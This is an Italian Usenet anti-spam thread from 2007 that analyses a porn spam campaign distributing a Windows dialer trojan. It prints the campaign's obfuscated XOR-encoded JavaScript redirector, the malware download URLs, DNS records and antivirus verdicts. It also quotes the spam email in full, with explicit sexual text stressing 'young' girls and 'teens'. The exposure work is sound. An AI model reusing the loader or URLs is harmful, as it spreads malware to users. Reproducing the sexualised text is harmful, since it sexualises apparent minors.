Porno spam italiano per dialer Csinfo
furio ercolessi
anche a minori) mediante metodi criminali (bots), pubblicizza la URL:
http://www.geocities.com/d_kozexav
il cui payload e' costituito da:
<script language="JavaScript" type="text/javascript">var ynope="ajcrtgzvwmfanhwu";var iatuatddl=0;var kktgxzhkge,nefpdt,sxxay="5d1900001d170e56574d0a00000f0214060f5e503e060c17240e14081e1c554b16030d161b105402181d480d010b160108050d5c1c151f1057504646061c03055b454c021b031b0418065455400119130e450d1703145d4d4b4215021c0107015f";nefpdt='';var uyjycuwm;for( kktgxzhkge=0;kktgxzhkge<sxxay.length;kktgxzhkge+=2){uyjycuwm=unescape( '%'+sxxay.substr( kktgxzhkge,2));nefpdt+= String.fromCharCode( uyjycuwm.charCodeAt(0) ^ ynope.charCodeAt(iatuatddl++) );if ( iatuatddl >= ynope.length ) iatuatddl = 0;}document.write(nefpdt);</script>
Questo e' un semplice redirector a http://podarok24.info/news
[ podarok24.info. 3600 IN A 195.209.224.230
podarok24.info. 86400 IN NS ns3.itcs.spb.ru.
podarok24.info. 86400 IN NS dns.bestdnsservice.ru.
dns.bestdnsservice.ru. 3600 IN A 195.209.224.230
ns3.itcs.spb.ru. 86400 IN A 80.249.177.154
--> http://www.spamhaus.org/SBL/sbl.lasso?query=SBL50466 ]
che a sua volta, con ulteriori trucchi vari per offuscare e iframes,
ci porta al target: http://pokupki24.info/counter/exe.php
(chi ha Windows NON CLICCHI), un eseguibile compresso UPX sul quale
gli antivirus hanno le seguenti opinioni:
Antivirus Version Last Update Result
--------- ------- ----------- ------
AhnLab-V3 2007.9.22.0 2007.09.21 Win-Trojan/Dialer.13968
AntiVir 7.6.0.15 2007.09.21 DIAL/Generic
Authentium 4.93.8 2007.09.21 Possibly a new variant of W32/Dialer.TCS-behavior!Maximus
Avast 4.7.1043.0 2007.09.21 -
AVG 7.5.0.485 2007.09.21 Potentially harmful program Dialer.EWE
BitDefender 7.2 2007.09.22 Trojan.Dialer.QN
CAT-QuickHeal 9.00 2007.09.21 -
ClamAV 0.91.2 2007.09.21 -
DrWeb 4.33 2007.09.22 -
eSafe 7.0.15.0 2007.09.19 suspicious Trojan/Worm
eTrust-Vet 31.2.5154 2007.09.21 -
Ewido 4.0 2007.09.20 Trojan.Dialer.qn
FileAdvisor 1 2007.09.22 -
Fortinet 3.11.0.0 2007.09.22 Dial/Porn
F-Prot 4.3.2.48 2007.09.21 W32/Dialer.TCS-behavior!Maximus
F-Secure 6.70.13030.0 2007.09.21 Trojan.Win32.Dialer.qn
Ikarus T3.1.1.12 2007.09.22 Trojan.Win32.Dialer.qn
Kaspersky 4.0.2.24 2007.09.22 Trojan.Win32.Dialer.qn
McAfee 5125 2007.09.21 potentially unwanted program Dialer-gen
Microsoft 1.2803 2007.09.21 -
NOD32v2 2544 2007.09.21 a variant of Win32/Dialer.QN
Norman 5.80.02 2007.09.21 -
Panda 9.0.0.4 2007.09.22 Suspicious file
Prevx1 V2 2007.09.22 -
Rising 19.41.42.00 2007.09.21 -
Sophos 4.21.0 2007.09.22 -
Sunbelt 2.2.907.0 2007.09.20 -
Symantec 10 2007.09.22 Dialer.Pianoforte
TheHacker 6.2.5.064 2007.09.21 Dialer/Generico
VBA32 3.12.2.4 2007.09.20 Trojan.Win32.Dialer.qn
VirusBuster 4.3.26:9 2007.09.21 Dialer.DialXS.Gen
Webwasher-Gateway 6.0.1 2007.09.21 Dialer.Generic
Nell'eseguibile si trova il testo:
"ATTENZIONE SERVIZIO RISERVATO AD UN PUBBLICO ADULTO
La fruizione di questo servizio comporta l'abbattimento della connessione in
corso con il tuo ISP e l'instaurazione di una nuova connessione tramite la
numerazione a tariffazione specifica 899 020368.
Il costo fisso della chiamata addebitato in bolletta
15,00 IVA Inclusa per un massimo di 6 minuti di collegamento.
[...]
IL SERVIZIO E' OFFERTO DA TRANENT B.V. (NL)"
Tranent dice di se' (in http://www.tranent.nl/ita/company.html):
La Tranent BV h un'azienda iscritta alla Camera di Commercio di
Amsterdam, n. 332843484 del 24.08.1978, partita IVA NL0048.96.178.B01.
www.tranent.nl. 86400 IN A 194.178.112.5
tranent.nl. 86400 IN MX 10 smtp.redhosting.nl.
smtp.redhosting.nl. 86400 IN A 89.184.161.40
tranent.nl. 7200 IN NS ns1.redhosting.nl.
tranent.nl. 7200 IN NS ns2.redhosting.nl.
ns1.redhosting.nl. 7200 IN A 213.239.164.4
ns2.redhosting.nl. 7200 IN A 213.239.164.5
899 020368 fa parte dell'arco di numerazione di CSINFO S.p.A. (csinfo.it)
Csinfo fa pure la gestione del DNS della rete 194.178.112.0/22 in cui
si trova www.tranent.nl:
112.178.194.in-addr.arpa. 1D IN NS csserver.csinfo.net.
112.178.194.in-addr.arpa. 1D IN NS ns.dns1-csinfo.it.
ns.dns1-csinfo.it. 6h59m55s IN A 212.48.160.6
csserver.csinfo.net. 1d6h59m55s IN A 212.48.160.5
In effetti 194.178.112.0/22 contiene quasi interamente siti nella
gerarchia .it popolati da dialers.
Csinfo e' gia' stata osservata piu' volte in associazione con
attivita' criminale di spam associata alla distribuzione di dialer
[ http://www.google.com/search?num=100&q=csinfo+dialer ].
C'e' una assoluta continuita' fra questi spam e quelli cosiddetti
"dell'avvocato" dell'anno scorso, come appare evidente sia dai
contenuti, incluse le tecnologie di offuscamento, che dagli spostamenti
degli IP (chiaramente gestiti da russi o ucraini). E forse con
gran parte dello spam simile circolato nel periodo 2001-2005.
furio
=============================================================================
Return-Path: <RQgener...@mail2racer.com>
Received: from varvara.mail2racer.com (pppoe-12.27.110.89-adsl.spbnit.ru [89.110.27.12])
by mta2.spin.it (Postfix) with SMTP id 4290C13EF8
for <(munged)>; Fri, 21 Sep 2007 22:50:38 +0200 (CEST)
Message-ID: <000f01c7fcb2$96487e20$0013d30c@varvara>
From: "Dianna Payton" <RQgener...@mail2racer.com>
To: <(munged)>
Subject: Re: Bnevenuti a FREE ITALIAN SEX
Date: Sat, 22 Sep 2007 00:50:35 +0400
MIME-Version: 1.0
Content-Type: text/plain
boundary="----=_NextPart_000_000C_01C7FCB2.96487E20"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Office Outlook, Build 11.0.6353
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1409
Giovani ragazze con le fighe pelose, donne con la figa pelosa, sesso orale e sesso anale.
Prodigiosamente giovane sesso, free movie giovani teens. ... ... Non siete curiosi?
Vdieo con prima esperienza delle ragazze giovane di fare pompini.
http://www.geocities.com/d_kozexav
:)
Vernon
Marco d'Itri
>Csinfo e' gia' stata osservata piu' volte in associazione con
>attivita' criminale di spam associata alla distribuzione di dialer
>[ http://www.google.com/search?num=100&q=csinfo+dialer ].
E prima ancora in associazione a spamming in generale su it.*, me li
ricordo bene:
http://groups.google.com/group/it.tlc.telefonia.adsl/browse_frm/thread/f1b23553715de6d0/9bb355fd12c4d292
--
ciao, |
Marco | The Italian Usenet Cabal, Abuse Department (TINC)
"It's about damn time that all of us who actually give a damn about Usenet
stand up and tell the people who don't to fuck off and die." -- Russ Allbery